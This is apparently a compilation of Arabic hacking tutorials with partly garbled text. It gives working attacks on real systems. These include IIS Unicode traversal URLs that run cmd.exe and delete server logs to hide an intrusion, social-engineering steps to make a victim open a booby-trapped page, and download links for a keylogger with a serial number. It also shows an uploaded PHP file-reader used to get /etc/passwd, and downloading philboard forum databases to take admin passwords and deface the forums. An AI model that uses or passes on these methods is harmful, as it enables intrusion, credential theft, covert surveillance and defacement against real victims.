\:http://www.xxx.com/scripts/xx.exe/c+dir+c ‫ بھذه الطريقة‬echo ‫والن نفذ المر‬ http://www.xxx.com/scripts/CMD1.exe?/c+echo+ xxxxx <+ c:\mega\2.htm ‫انا كده انتھیت بس لسه حاجة مھ مة جدااااااااااااااااااااااا‬ ‫وھ ي مسح الثر النتبقي من اختراقك عن طريق المر‬


‫‪ http://www.xxxx.com/_vti_bin‬‬ ‫‪ %../‬‬ ‫‪c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:/winnt/system‬‬ ‫‪ 32/logfiles/*.log‬‬ ‫ده تقريبا ما يمكنني التحدث عنه بشان سیرفرات‪ IIS ‬‬ ‫واتمنى ان يحوز رضاكم‪ ‬‬ ‫‪ 292‬‬ ‫اختراق موقع مجاني‪ ‬‬ ‫للكاتب‪ :‬الــ<>ــد<>ــر‪ ‬‬ ‫السلم علیكم ورحمة االله وبركاته‪ ‬‬ ‫في ھ ذا الدرس سوف اقوم بتعلیمكم كیف تقومون بسرقة موقع مجاني‪ ‬‬ ‫أوسرقة بريد ‪ +‬عضو في منتدى وإلى آخره من اھتمامات الضحیة‪ ‬‬ ‫ألحین لن نلجأ إلى استعمال الثغرات مثل الیونیكود والبحث عن ثغرات أباتشي‬ ‫او ثغرات المیكروسوفت‪ ‬‬ ‫بل يمتاز ھذا الدرس بالسھولة‪ ‬‬ ‫أول شي لزم أعلمكم الساسیات في اختراق أي موقع مجاني‪ :‬‬ ‫‪-1‬معرفة إصدار المتصفح‪ ‬‬ ‫‪-2‬معرفة بیانات صاحب الموقع مثل إيمیل ماسنجر أو يتوفر لديه سجل زوار‪ ‬‬ ‫‪-3‬برنامج سرقة كل ماكتبه الضحیة من باسوورد ‪ +‬برنامج إلغام المواقع‪ ‬‬ ‫========(الشرح)========‪ ‬‬ ‫‪ -1‬كیف تعرفه ھذا من أبسط العملیات التي سوف تقوم بھا‪ ‬‬ ‫إبحث في أسفل الموقع راح تجد يفضل تصفحة بدقة معینة وحلوھا لزم تلقي‬ ‫إصدار الكسبلورر (المتصفح اللي يستخدمه الموقع)‪ ‬‬ ‫‪-2‬ھذا عاد علیك أنا مالي شغل إنت المفروض تعرفه وتجیبه بنفسك‪ ‬‬ ‫‪-3‬سوف نتطرق إلیھا في السفل‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ +=+‬كیف تخدع الضحیة وتجبره على فتح الموقع الملغوم اللي لو فتحه راح‪ ‬‬ ‫يتحمل الملف التجسسي في جھازه وتتملكه بالكامل ‪ +=+‬‬ ‫‪ 392‬‬ ‫(ھذي اصعب نقطة في الدرس)‪ ‬‬ ‫لكن إنشاء االله أستطیع تقريب الفكرة لديكم‪ ‬‬ ‫ناخذ مثال على‪ ‬‬ ‫‪ http://www.freeservers.com‬‬ ‫تحدد نوعیة الشركة للموقع وتذھب إلیه لیش؟‪ ‬‬ ‫عشان تسجل فیه ويرسلون لك البیانات وعاد إنت ألحین عندك التصمیم حق‪ ‬‬ ‫البیانات للموقع اللي سجل فیه نفسه (الضحیة)‪ ‬‬ ‫<><الفكرة ومافیھا تخلي الضحیة يفتح موقعك><>‪ ‬‬ ‫وألحین ترسله الرسالة اللي أرسلوھا لك ‪ FreeServers‬له عشان يفتح موقعك‪ ‬‬ ‫الملغوم‪ ‬‬ ‫طیب لو ماعنده إيمیل كیف تلعب علیه‪ ‬‬ ‫بسیطة فیه شي اسمه سجل الزوار روح عنده واكتب له‪ ‬‬ ‫تفضل وشوف ھذا الموقع ھذا نفس تصمیمك ونفس كل شي (((إلعب علیه)))‬ ‫الن سوف نعتمد على برنامج خطیر جدا وقوي ول يكشفه إصدارات النورتورن‪ ‬‬ ‫القديمة ماقبل ‪ 1002‬‬ ‫وظیفة البرنامج‪/‬تسجیل كل ماكتبه الضحیة من باسوورد وكل مالديه‪ ‬‬ ‫وصلة البرنامج‪ http://www.mikkotech.com/kk2000pro.exe /‬‬ ‫السیريال نمبر‪ 9SN: K100­43­109­0­793218E876A4C-92/‬‬ ‫برنامج في غاية القوة والبساطة‪ ‬‬ ‫<<<لتحكم قبل أن تجرب‪ ‬‬ ‫‪ 492‬‬


‫الن انتھ ینا من تحمیل برنامج التجسس‪ ‬‬ ‫لم يبقى سوى برنامج لتلغیم المواقع‪ ‬‬ ‫‪godwill‬وھ و البرنامج الخاص للغام الموقع على انترنت اكسبلور ‪ 5‬و ‪((5.5‬ھذه‬ ‫ھي سر المھنه))ووصلته‪ ‬‬ ‫‪ http://www.thecorpz.org/activex/gwpackage.zip‬‬ ‫واللي يبغى الشرح التوضیحي‪ ‬‬ ‫يروح الشرح ھذا‪ ‬‬ ‫‪ 2=arabteam.nicmatic.com/vb/forumdisplay.php?forumid‬‬ ‫‪ +‬الفريق العربي للبرمجة ‪ +‬‬ ‫=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪ ‬‬ ‫والحین وبعد ماخلصنا من وضع الصفحة الملغومة‪ ‬‬ ‫نخلي الضحیة تفتحھا بالطرق اللي ذكرتھا‪ ‬‬ ‫=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪ ‬‬ ‫][?][وبعد أن تفتح الضحیة موقعك الملغوم مھمتك تصبح النتظار][?][‪ ‬‬ ‫‪ 592‬‬ ‫‪ FrontPage Extension‬‬ ‫للكاتب‪ T.O.L. ( DeXXa (:‬‬ ‫ما الذي يجب أن تعرفه قبل قراءة ھذا الدرس ‪ :‬‬ ‫*اللمام بالنجلیزية ‪ .‬‬ ‫*قراءة المزيد عن الـ ‪ FrontPage Server Extensions‬و لیس كیفیة اختراقه ‪ .‬‬ ‫*كیفیة التعامل مع برنامج ‪ Microsoft Office FrontPage .‬‬ ‫*كیفیة التعامل مع الـ ‪ CHMOD .‬‬ ‫*كیفیة التعامل مع الـ ‪ Telnet .‬‬ ‫*كیفیة التعامل مع بروتوكول ‪ HTTP .‬‬ ‫*كیفیة التعامل مع قواعد البیانات العلئقیة ‪ SQL .‬‬ ‫*كیفیة التعامل مع أحد لغات الويب و التي تعمل بناحیة الخادم ‪ Server Side‬‬ ‫‪ . Scripting Language‬‬ ‫و اذكر أخیًر بأني اؤمن بأن المخترق ما ھ و إل انسان وظیفته البرمجة و ادارة و‬ ‫ا‪ ‬‬ ‫تحلیل النظم و الشبكات و لیس انسان ھمه ھو معرفة القلیل‪ ‬‬ ‫من المور التي تساعده في التخريب و العبث بما تعب به الخرون و تضییع‪ ‬‬ ‫الوقت في الدردشة و التسكع بمقاھي النترنت ‪ ،‬و لذا فافترض بأن‪ ‬‬ ‫ح و ل يحتاج لـ ‪ Screen Capture .‬‬ ‫ما أقوله سیكون واض ً‬ ‫ا‪ ‬‬ ‫@خريطة الموضوع ‪ :‬‬ ‫‪.‬ما الذي ستسفیده عند قراءة الموضوع ؟‪ ‬‬ ‫‪.‬مقدمة‪ ‬‬ ‫‪.‬ما ھو الـ ‪ FrontPage Server Extensions‬؟‪ ‬‬ ‫‪.‬ما ھي آلیة عمل الـ ‪ FrontPage Extension Server‬؟‪ ‬‬ ‫‪.‬كیفیة التصال بـ ‪ FrontPage Extension Server‬‬ ‫‪.‬كیفیة معرفة ھل الموقع يدعم الـ ‪ FrontPage‬أم ل‪ ‬‬ ‫‪.‬كیفیة استغلله لیصبح في صلحك‪ ‬‬ ‫@ما الذي ستستفیده عند قراءتك للموضوع ؟‪ ‬‬ ‫*ستعرف ما ھو الـ ‪ FrontPage Server Extensions .‬‬ ‫*آلیة عمله ‪ .‬‬ ‫*كیفیة جمع المعلومات الخاصة بأي موقع ‪ .‬‬ ‫*بعض الطرق للستفادة منه عند التصال بالخادم الخاص به ‪ .‬‬ ‫‪ 692‬‬ ‫@مقدمة ‪ :‬‬ ‫تسعى شركات التسكین بأنواعھا توفیر شتى شبل الراحة لعملئھا ‪ ،‬فتجدھم‬


‫يقدمون العروض و التخفیضات لرضاء العملء مثل دعم لـ ‪ PHP‬و‪ ‬‬ ‫‪CGI‬و ‪ Perl‬و ‪ SSL‬و ‪ FTP‬و ‪ SQL .‬‬ ‫و بالنسبة لمدارء المواقع ‪ Webmasters‬فإن البرنامج المفضل لھم لتصمیم‪ ‬‬ ‫مواقعھم ھو ‪ Microsoft Office FrontPage‬و الذي كما ھو مبین يأتي‪ ‬‬ ‫مع حزمة ‪ ، Office‬اذ يتمیز بسھ ولة استعماله كما انه يوفر بعض البرمجیات‪ ‬‬ ‫مثل عداد الزوار ‪ ،‬و لذا تقدم شركات التسكین دعم كامل للبرنامج ‪ .‬‬ ‫@ما ھو الـ ‪ FrontPage Server Extensions‬؟‪ ‬‬ ‫ی عن الحزم التي أتت بعد حزمة الصدار الثاني‪ ‬‬ ‫ملحظة ‪ :‬سأتكلم حال ً‬ ‫ا‪ ‬‬ ‫ھ و عبارة عن حزمة من البرامج يتم تثبیتھا في الخادم ‪ Server‬الخاص بشركة‪ ‬‬ ‫التسكین التي لھا قالبیة لدعم بعض الخصائص ‪ .‬‬ ‫و عند التثبیت يجب انشاء عدة مجلدات منھا ‪ :‬‬ ‫‪ /_private‬‬ ‫‪ /_vti_bin‬‬ ‫‪ /_vti_cnf‬‬ ‫‪ /_vti_log‬‬ ‫‪ /_vti_pvt‬‬ ‫‪ /_vti_txt‬‬ ‫و سأتكلم عن وظیفة كل مجلد يھمنا ‪ :‬‬ ‫*المجلد ‪ _vti_bin :‬‬ ‫‪ 792‬‬ ‫و يتواجد بداخله مجلدان ھما ‪ :‬‬ ‫ملحظة ‪ :‬النقطتان تشیران إلى المجلد ‪ _vti_bin‬‬ ‫‪ /../_vti_adm‬‬ ‫‪ /../_vti_aut‬‬ ‫الثاني ل يھمنا بقدر ما يھ م المجلد الول اذ أنه الخاص بالمشرف ول تستطیع‪ ‬‬ ‫الستفادة منه اذا لم تحصل على كلمة المرور الخاصة به ‪ .‬‬ ‫كما يوجد ملفان ھما ‪ :‬‬ ‫‪ ../shtml.exe‬‬ ‫‪ ../fpcount.exe‬‬ ‫*المجلد ‪ _vti_pvt :‬‬ ‫و يتواجد بداخله عدة ملفات ما يھمنا منھا ھو الملفات التالیة ‪ :‬‬ ‫الملف ‪ service.pwd :‬و فیه يتواجد المعرف و كلمة المرور الخاصة بالمشرف‪ ‬‬‫مشفرة بمقیاس ‪ DES .‬‬ ‫الملف ‪ service.grp :‬و فیه يتواجد المعرفین من مشرفین و ‪ authors .‬‬‫ملفي ‪ deptodoc.btr‬و ‪ doctodep.btr :‬و فیه يتواجد مسارات الملفات التي‪ ‬‬‫تم تحمیلھ ا على الخادم ‪ ،‬فاذا قمت بتنزيله فتستطیع معرفة الملفات‪ ‬‬ ‫الموجودة بالموقع ‪ .‬‬ ‫و في الغالب ل تستطیع معاينة محتويات المجلد اذ يوجد في المجلد الرئیسي‬ ‫للموقع ملف ‪ .htaccess‬يقوم بمنع الجمیع المالك و المجموعة و الزوار من‪ ‬‬ ‫معاينة المجلد و محتوياته ‪ .‬‬ ‫ملحظة ‪ :‬ان عدم وضع أي صلحیة على المجلدل يعني بأنھا تعتبر ثغرة و لكن‬ ‫ضعف من الناحیة‪ ‬‬ ‫*المجلد ‪ _private :‬‬ ‫و يتواجد بداخله ملف واحد فقط ھو ‪ .htaccess .‬‬ ‫@ما ھي آلیة عمل الـ ‪ FrontPage Extension Server‬؟‪ ‬‬ ‫يعتمد التصال بین العمیل و الـ ‪ FrontPage Extension Server‬على بروتوكول‪ ‬‬ ‫الـ ‪ HTTP .‬‬ ‫فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ ‪ FrontPage‬فانه يتم ارسال‪ ‬‬ ‫‪ 892‬‬


‫طلب ‪ Request‬للخادم ثم يمرره الخادم بالـ ‪ FrontPage Extension Server‬‬ ‫و الذي يمرره بالتالي ببرمجیات الخادم مثل ‪ ، fpcount.exe‬و من ثم يكرر تمريره‬ ‫مرة أخرى إلى الـ ‪ Extension Server‬و إلى الخادم و يظھر المخرجات‪ ‬‬ ‫م ان ھذه التصالت تتم عبر جدار نار ‪ .‬‬ ‫لـ العمیل ‪ ،‬عل ً‬ ‫ا‪ ‬‬ ‫@كیفیة التصال بـ ‪ FrontPage Extension Server :‬‬ ‫كما ذكرنا سابقً ان أغلب شركات التسكین تسعى لراحة العملء ‪ ،‬فتجدھا‪ ‬‬ ‫ا‪ ‬‬ ‫م بأنھا‪ ‬‬ ‫عل‬ ‫للموقع‬ ‫تدعم خدمة الـ ‪ FrontPage‬و ذلك لتحمیل الصفحات‬ ‫ً‬ ‫ا‪ ‬‬ ‫تدعم بروتوكول الـ ‪ FTP‬و تحمیل الملفات و انشاء المجلدات عبر المتصفح‪ ‬‬ ‫اعتماد ً على البرمجیات التي تعمل بناحیة الخادم ‪ .‬‬ ‫ا‪ ‬‬ ‫و الن قم بتنفیذ التالي لمعرفة كیفیة التصال بالـ ‪ FrontPage Extension‬‬ ‫‪ : Server‬‬ ‫ی عن حزمة الـ ‪ XP‬و التي ل تختلف أبد ً عن الحزم‪ ‬‬ ‫ملحظة ‪ :‬سأتكلم حال ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫الباقیة إل في بعض النقاط الشكلیة‪ ‬‬ ‫*قم بتشغیل برنامج الـ ‪ FrontPage‬و الذي يأتي مرفقً مع حزمة ‪ Office .‬‬ ‫ا‪ ‬‬ ‫*من قائمة ‪ File‬قم باختیار ‪ Open Web .‬‬ ‫*قم باضافة المعرف و كلمة المرور ( الصلیة و لیست المشفرة ‪ ( .‬‬ ‫*اذا كانت صحیحة سیظھر لك الخادم ملفات الموقع كلھا و عندھا تستطیع‪ ‬‬ ‫التحمیل و التعديل في الملفات و المجلدات و معاينة الشفرة المصدرية‪ ‬‬ ‫للملفات ‪ .‬‬ ‫*اذا لم تتم العملیة بنجاح فھ ذا يعني بأن الموقع ل يدعم الخدمة أو أن المعرف‬ ‫أو كلمة المرور خاطئة و يطلب منك معاينتھا في وضعیة القراءة و ل‪ ‬‬ ‫يظھ ر لك الشفرة المصدرية الصلیة ول المجلدات و الملفات التي يحويھا الموقع‪ ‬‬ ‫‪ .‬‬ ‫@كیفیة معرفة ھل الموقع يدعم الـ ‪ FrontPage‬أم ل ‪ :‬‬ ‫يوجد العديد من الطرق لمعرفة قابلیة الموقع لدعم الفرونت بیج نذكر منھا ‪ :‬‬ ‫*معاينة ملف نجاح التثبیت ‪ :‬‬ ‫ملحظة ‪ :‬قد ل تجد ملف ‪ _vti_inf.html‬و لكن ھ ذا ل يعني أن الموقع ل يدعم‬ ‫الخدمة ‪ ،‬كما أنه ل يعتبر ثغرة‪ ‬‬ ‫قم بزيارة أي موقع تريد أن تعرف ھل الخادم الخاص به يدعم الـ ‪ FrontPage‬‬‫أم ل ‪ .‬‬ ‫قم بمعانیة ملف ‪ _vti_inf.html‬بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع‬‫‪ 992‬‬ ‫‪ ،‬مثال ‪ :‬‬ ‫‪ http://www.Victim.com/_vti_inf.html‬‬ ‫و عند معاينة الصفحة ستجد جملة ‪FrontPage Configuration Information‬‬‫‪ ،‬فھذا معناه أن حزمة الـ ‪ FrontPage Extension Server‬قد تم تثبیتھا‪ ‬‬ ‫في الخادم بنجاح ‪ .‬‬ ‫و لمعرفة اصدارة الخدمة قم بالتالي ‪ :‬‬ ‫قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختیار ‪ Source Code .‬‬‫قم بالبحث عن " ‪ FPVersion="Version‬حیث ‪ Version‬تشیر للصدار الخاص‪ ‬‬‫بالخدمة ‪ .‬‬ ‫*عن طريق مجلد ‪ _vti_cnf :‬‬ ‫قم بزيارة أي موقع تريد أن تعرف ھل الخادم الخاص به يدعم الـ ‪ FrontPage‬‬‫أم ل ‪ .‬‬


‫قم بمعانیة المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ‪ ،‬مثال ‪ :‬‬‫‪ http://www.Victim.com/_vti_cnf‬‬ ‫قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختیار ‪ Source Code .‬‬‫قم بالبحث عن الشفرة التالیة ‪ :‬‬‫‪ vti_generator:Programe‬‬ ‫حیث ‪ Programe‬يشیر لنوع البرنامج و اصدارته و سیكون في حالتنا ھو‪ ‬‬‫‪Microsoft FrontPage X‬و الصدارة الخاصة به ھي ‪ X .‬‬ ‫*الكشف عن الشفرة المصدرية للصفحة ‪ :‬‬ ‫قم بزيارة أي موقع تريد أن تعرف ھل الخادم الخاص به يدعم الـ ‪ FrontPage‬‬‫أم ل ‪ .‬‬ ‫قم بالنقر بزر الفأرة اليمن على الصفحة ‪ ،‬ثم قم باختیار ‪ Source Code .‬‬‫قم بالبحث بین ترمیزي الرأس <‪ <Head></Head‬عن الشفرة التالیة ‪ :‬‬‫‪ >"<Meta Name="GENERATOR" Content="Programe‬‬ ‫حیث ‪ Programe‬يرمز لنوع البرنامج و اذا كان البرنامج ھو ‪ Microsoft‬‬‫‪ FrontPage X.0‬يتبین لنا بأن الخادم الخاص بالموقع يدعم الفرونت بیج و‪ ‬‬ ‫الصدارة الخاصة به ھي ‪ X .‬‬ ‫*عن طريق موقع ‪ NetCraft :‬‬ ‫قم بزيارة الموقع ‪ NetCraft.net .‬‬‫ی الـ ‪ . http://‬‬ ‫قم بكتابة عنوان الموقع مستثن ً‬‫ا‪ ‬‬ ‫انتظر بضع ثواني ‪ .‬‬‫ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة‪ ‬‬‫‪ 003‬‬ ‫في الموقع الذي تريد معرفة قابلیة دعمه للبرنامج ‪ ،‬و من تلك الخدمات‪ ‬‬ ‫خدمة الـ ‪ FrontPage‬و ستظھر لك بالشكل ‪ mod_frontpage/X‬حیث ‪ X‬يرمز‪ ‬‬ ‫لصدارة الـ ‪ FrontPage Extensions Server .‬‬ ‫*عن طريق الـ‪ Telnet :‬‬ ‫ملحظة ‪ :‬تساعد ھ ذه الطريقة في معرفة بعض المعلومات عن الخادم و‪ ‬‬ ‫المخرجات ھي نفس مخرجات الطريقة السابقة‪ ‬‬ ‫من قائمة ‪ Start‬قم باختیار ‪ Run‬و اكتب بالنافذة التي ستظھر ‪ Telnet .‬‬‫قم بالتصال بالموقع عبر المنفذ ‪ 08‬بالشكل التالي ‪ :‬‬‫‪ 80 http://www.victim.com/Microsoft Telnet> Open‬‬ ‫قم بارسال طلب ‪ Request‬للخادم و لتكن الطريقة ‪ Method‬ھي ‪ Head .‬‬‫ملحظة ‪ :‬علیك اللمام بكیفیة التعامل مع بروتوكول ‪ HTTP‬‬ ‫قم بارسال التالي حیث ‪ http://www.victim.net/‬ھو الموقع الضحیة و‪ ‬‬‫‪ISP.net‬ھو البروكسي الخاص بمزود الخدمة الخاص بك ‪ :‬‬ ‫‪ HTTP/1.1 http://www.victim.net/Head‬‬ ‫‪ Host: ISP.net‬‬ ‫‪ */* :Accept‬‬ ‫‪ Connection: close‬‬ ‫انتظر بضع ثواني ‪ .‬‬‫ستستلم الجابة ‪ Response‬عن الطلب الذي ارسلتھب للخادم ‪ Server‬مثل‬‫تاريخ آخر تعديل للصفحة و نوع الملقم و الخدمات المتوفرة به ‪ .‬‬ ‫و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و ھو أن‪ ‬‬ ‫خدمة الـ ‪ FrontPage‬و ستظھر لك بالشكل ‪ mod_frontpage/X‬‬ ‫حیث ‪ X‬يرمز لصدارة الـ ‪ FrontPage Extensions Server .‬‬ ‫@كیفیة استغلله لیصبح في صالحك ‪ :‬‬ ‫اذا عثرت على موقع يدعم ھذه الخدمة و لم يتم وضع صلحیات على مجلد الـ‬ ‫‪_vti_pvt‬قم بالتالي ‪ :‬‬ ‫ملحظة ‪ :‬علیك اللمام بلغة تعمل على ناحیة الخادم و في حالتنا فھي الـ‪ ‬‬


‫‪ ،PHP‬كما أن على الموقع الضحیة دعم ھذه اللغة‪ ‬‬ ‫‪ 103‬‬ ‫*قم بالتصال بالموقع الضحیة ‪ .‬‬ ‫*قم بتحمیل ملف ينتھي امتداده بـ ‪ PHP‬و ضمنه التالي ‪ :‬‬ ‫‪ <?PHP‬‬ ‫‪ ;)"$open = FOpen($file, "r‬‬ ‫‪ ;))$get = FGets($open, FileSize($file‬‬ ‫‪ ;Echo $get‬‬ ‫‪ ;FClose $open‬‬ ‫?>‪ ‬‬ ‫و قمنا ھنا برفع ملف ‪ PHP‬للخادم يقوم بفتح ملف غیر معین ثم يحضر محتوياته‬ ‫على حسب حجمه بالبايت ثم يعرضه ثم يغلق الملف ‪ ،‬و الن كل‪ ‬‬ ‫ما علیك فعله الن ھ و الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان‪ ‬‬ ‫الملف الذي حملته و المتغیر ‪ file‬و الملف الذي تريد معاينة الشفرة‪ ‬‬ ‫المصدرية الخاصة به ‪ ،‬مثال ‪ :‬‬ ‫‪ http://www.victim.com/uploded_file.php?file=/../../../etc/passwd‬‬ ‫حیث ‪ uploded_file‬يشیر لسم الملف الذي قمت بتحمیله ‪ ،‬و تستطیع اضافة‬ ‫اوامر تسمح لك بمعاينة الملفات و المجلدات الموجودة في الخادم‪ .‬‬ ‫‪ 203‬‬ ‫اختراق المواقع من نوع‪ philboard.asp‬‬ ‫للكاتب‪ cRaZy hAcKeR :‬‬ ‫كما يعرف الجمیع ان اختراق المواقع من اصعب امور الختراق لذلك فھو يتطلب‪ ‬‬ ‫منك لدراسة الثغرات والنظمة والسیرفرات المختلفة دراسة متفحصة (دراسة‪ ‬‬ ‫احتراف) ومتابعة الثغرات الموجودة في ھ ذه النظمة‪ ........‬‬ ‫قد يسأل سائل عن الثغرات ‪ ..‬ما ھي وكیف نعرفھا وكیف يمكن الستفادة منھا‬ ‫بعد معرفتھا ؟؟‪ ‬‬ ‫الثغرات ‪:‬ھ ي عبارة عن أخطاء برمجیة غیر مقصودة في ھذه النظمة يستغلھا‪ ‬‬ ‫الھكر للوصول الى اسم وباسوورد الدمن ( المدير العام)‪ ‬‬ ‫كیف نتعرف علیھ ا ‪ :‬لكي تكتشف ثغرة بنفسك فان ھذا يتطلب منك اجادة‪ ‬‬ ‫بعض اللغات البرمجیة كالسي والسي ‪ ++‬والبیرل والجافا وقد يكتفي بعضھم‪ ‬‬ ‫ويقتصر على لغة او لغتین ‪..‬وكذلك اجادة اللغة النجلیزية في المقام الول‪ .‬‬ ‫طیب ‪ ..‬اذا لم تكن مبرمجا ويصعب علیك تعلمھا ما ذا تفعل ؟‪ ‬‬ ‫تابع مواقع الحماية ‪ security sites‬لتتعرف على احدث واخر الثغرات الموجودة‪ ‬‬ ‫ويتطلب منك فقط اجادة اللغة النجلیزية بنسبة ‪ %07‬على القل‪ ‬‬ ‫ * ‪-‬مصطلحات ‪ :‬ھامة للبحث عن الثغرات‪ ‬‬‫ثغرات ‪ : exploits‬او ‪ Vulnerabilities‬‬ ‫ * ‪-‬وكیف نستخدمھا ؟‪ ‬‬‫اذھب الى ‪ google‬اذا عرفت عن ثغرة ما واكتب البرنامج الذي به ثغرة وبجانبه‪ ‬‬ ‫كلمة ‪ exploit‬او ‪ Vulnerabilities‬‬ ‫او ابحث عنه في مواقع السیكیورتي‪ ‬‬ ‫وستجدھا مشروحة في ھ ذه المواقع مع طريقة التطبیق لكن ل بد ان يكون‪ ‬‬ ‫لديك خلفیة سابقة عن النظمة والسیرفرات حتى تستطیع فھم الشرح ( لن‪ ‬‬ ‫شرحھم للثغرة ‪ :‬يعتبر شرح من ھكر لھكر ) فالذي لیس لدية قاعدة معلوماتیه‪ ‬‬ ‫‪ 303‬‬ ‫سابقة لن يستطیع الفھم ال بنسبة ‪ % 03‬تقريبا ‪ .‬‬ ‫ * ‪-‬مواقع الحماية التي أنصح بھا‪ :‬‬‫‪ /http://www.securityfocus.com‬‬ ‫‪ /http://www.packetstormsecurity.com‬‬ ‫‪ /http://www.securiteam.com‬‬ ‫‪+++++++++++++++++++++++++++++++++++++++++++‬‬


‫نبذة عامة عن اھ م المواضیع ولن اتعمق لمصلحة الموجودين‪ ‬‬ ‫بالنسبة للسیرفرات فھ ي كثیرة جدا ولكنني سأذكر اكثر السیرفرات انتشارا‪ ‬‬ ‫وھي نوعین‪ :‬‬ ‫‪1‬من شركة م يكروسوفت ويسمى ‪ IIS‬ولھ ا كثیر من الثغرات تسمى‪ ‬‬‫بالیونیكود‪ ‬‬ ‫‪2‬ونوع اخر يسمى ‪ apache‬أباتشي وھ و من مجموعة من المبرمجین حول‪ ‬‬‫العالم وله ثغرات ولكنھا اقل من ثغرات‪ IIS .‬‬ ‫ايضا ھ نالك ثغرات للنظمة المركبة على تلك السیرفرات والنظمة الموجودة‪ ‬‬ ‫غالبا ايضا كثیرة ولكن سأذكر المشھور والمنتشر‪ :‬‬ ‫‪1 /‬انواع الويندوز المعروفة واخص منھا ويندوز ‪ server 0002‬وويندوز ‪ NT‬‬ ‫‪2 /‬والكثر انتشارا من بین النظمة وھي عائلة الیونكس واللینكس بأنواعھا‪ ‬‬ ‫اذن أتقن نظام لینكس او يونكس ‪ +‬أتقن التعامل مع السیرفرات ولیكن أباتشي‬ ‫‪ +‬طور انجلیزيتك باستمرار ‪ +‬حاول ان تتعلم احد لغات البرمجة وذلك على‪ ‬‬ ‫حسب النظمة = ھ كر مواقع محترف‪ ‬‬ ‫ويوجد بديل لمن ل يريد استخدام نظام اللینكس وھو الشیل ‪ shell‬حیث يوفر‪ ‬‬ ‫لك تطبیق الوامر على السیرفرات بسھ ولة ومن بعد أيضا والموضوع يطول في‪ ‬‬ ‫ھذا المجال ‪ .‬‬ ‫لكن الھدف ان أعطي صورة واضحة وشاملة لھ م ما ينبغي ان يتعرف علیه من‬ ‫اراد الدخول لھذا العالم‪ .‬‬ ‫‪ 403‬‬ ‫‪+++++++++++++++++++++++++++++++++++++++++++‬‬ ‫نبدأ الدرس‪ ‬‬ ‫كانت ھ ذه مقدمة والن سأذكر احد الثغرات في بعض اللغات الدينامیكیة (‪(asp‬‬ ‫‪ active server pages‬‬ ‫طبعا ھذه اللغة وللسف بھا ثغرات عديدة وخصوصا في التعامل مع قواعد‪ ‬‬ ‫بیاناتھا‪ .‬‬ ‫بشكل مختصر ھ ذه اللغة تعتبر من لغات البرمجة الدينامیكیة التفاعلیة لبرمجة‪ ‬‬ ‫مواقع النترنت ولھا میزة بأن الكود لھا مخفي‪ ‬‬ ‫وتعتمد قواعد بیاناتھا على ثلثة أنواع ھي ‪ :‬‬ ‫‪ sqlserver && sql && M.S Access‬‬ ‫واما قاعدة بیانات ما يكروسوفت أكسس فثغراتھ ا من أبسط الثغرات بحیث انك‪ ‬‬ ‫اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطیع تحمیلھا على جھازك‬ ‫مباشرة وتصفح جمیع الباسوردات بسھولة ويسر وبدون تشفیر أيضا‪ .‬‬ ‫والیكم المثال من أحد المنتديات التي تتضح جلیه بھا ھذه الثغرة وھي باسم‪ ‬‬ ‫‪ philboard.asp‬‬ ‫مثل ھذا المنتدى ‪ http://www.khill.co.uk/forum/philboard.asp‬‬ ‫وطريقة ايجاد مثل ھذا النوع منتديات اذھب الى جوجل كما ذكرنا سابقا وابحث‬ ‫عن ‪ ­­­­­­­­­­­­­­ > philboard‬وانتظر النتائج‪ ....‬‬ ‫­‪ ­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+­+‬‬ ‫كیف تحمل قاعدة البیانات ؟‪ ‬‬ ‫اكتب ھذا المتداد‪ ‬‬ ‫وبعد ذلك حاول ان يكون المنتدى به عديد قلیل من المواضیع حتى يكون حجم‪ ‬‬ ‫قاعدة البیانات صغیر جدا للتطبیق والتسلیم بسرعة‪ ‬‬ ‫وھذا ھو امتداد واسم قاعدة البیانات لقاعدة البیانات‪ ‬‬ ‫‪ database/philboard.mdb‬‬ ‫وتكتبه بعد اسم الموقع والمنتدى مثل‪ ‬‬ ‫‪ http://www.khill.co.uk/forum/database/philboard.mdb‬‬ ‫ول بد لكي تقرا قاعدة البیانات ان يكون في جھازك برنامج ما يكروسوفت‪ ‬‬ ‫أكسس‪ ‬‬ ‫‪ 503‬‬


‫وبعد فتح قاعدة البیانات ستجد بداخلھا عدة جداول فیعا جمیع محتويات قاعدة‬ ‫البیانات‪ ‬‬ ‫من ضمنھا وھو المھم جدول المستخدمین ال ‪ users‬‬ ‫وستجد اول اسم عالبا ھو ‪ admin‬وھو اسم المدير العام مع الباسوورد‪ ‬‬ ‫وبعد ان حصلنا على السم والباسوورد ماذا تبقى ؟‪ ‬‬ ‫لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فیه وكأنك المشرف العام‬ ‫‪philboard_admin.asp‬وھذا عنوانھا‪ ‬‬ ‫مثال‪ ‬‬ ‫‪ http://www.khill.co.uk/forum/philboard_admin.asp‬‬ ‫ادخل وستجد كل منتدى وبجانبة كلمه ‪ delete‬و ‪ edit‬‬ ‫احذف كل المنتديات وأنشا منتديات جديدة واكتب علیھا‪ ‬‬ ‫‪xxxxxxxxx‬الي يعجبك‪ ‬‬ ‫‪xxxxxxx‬يعني اسمك بدلھا وضع الي تبي‪ ‬‬ ‫من وين ؟‪ ‬‬ ‫من المربعین الموجودة بالسفل في لوحة التحكم‪ ‬‬ ‫اكتب في المستطیل‪ ‬‬ ‫وفي المربع الي اسفله‪ ‬‬ ‫واضغط ‪ add‬يعني اضافه‪ ‬‬ ‫‪ 603‬‬ ‫تعلم الختراق‪ ‬‬ ‫للكاتب‪ DJ KING :‬‬ ‫يعتبر ھ ذا الموضوع و الذي انت على 